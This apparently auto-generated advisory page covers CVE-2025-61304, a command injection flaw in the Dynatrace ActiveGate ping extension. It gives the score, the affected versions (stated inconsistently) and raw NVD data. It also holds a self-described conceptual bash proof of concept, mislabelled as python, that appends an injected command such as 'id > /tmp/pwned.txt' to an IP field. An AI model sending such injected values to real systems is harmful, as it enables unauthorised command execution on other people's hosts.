Security Vulnerability Report
中文
CVE-2025-61304 CVSS 9.8 CRITICAL

CVE-2025-61304

Published: 2025-11-05 16:15:41
Last Modified: 2026-01-08 17:50:06

Description

OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dynatrace:activegate_ping_extension:*:*:*:*:*:*:*:* - VULNERABLE
Dynatrace ActiveGate ping extension < 1.016

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-61304 PoC - Dynatrace ActiveGate ping extension OS Command Injection # Target: Dynatrace ActiveGate ping extension < 1.016 TARGET_HOST="$1" INJECTED_CMD="$2" if [ -z "$TARGET_HOST" ] || [ -z "$INJECTED_CMD" ]; then echo "Usage: $0 <target_ip> <command>" echo "Example: $0 192.168.1.1 'id > /tmp/pwned.txt'" exit 1 fi # Malicious payload construction using command injection characters # The ping extension fails to sanitize IP address input PAYLOAD="${TARGET_HOST}; ${INJECTED_CMD}" # Send crafted request to ping extension endpoint # This is a conceptual PoC - actual exploitation requires understanding # the specific API endpoint and request format of the ping extension echo "[*] Target: $TARGET_HOST" echo "[*] Injected Command: $INJECTED_CMD" echo "[*] Payload: $PAYLOAD" echo "[!] Sending malicious request..." # Note: Replace the curl command with actual vulnerable endpoint # curl -X POST "http://<activegate-host>:<port>/api/ping" \ # -d "{"target": "$PAYLOAD"}" \ # -H "Content-Type: application/json" echo "[+] Request sent. Check for command execution on target."

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61304", "sourceIdentifier": "[email protected]", "published": "2025-11-05T16:15:40.770", "lastModified": "2026-01-08T17:50:05.627", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dynatrace:activegate_ping_extension:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.016", "matchCriteriaId": "2B3CB92A-E15B-46BD-BC8C-B82306249B64"}]}]}], "references": [{"url": "https://github.com/pentastic-be/CVE-2025-61304", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}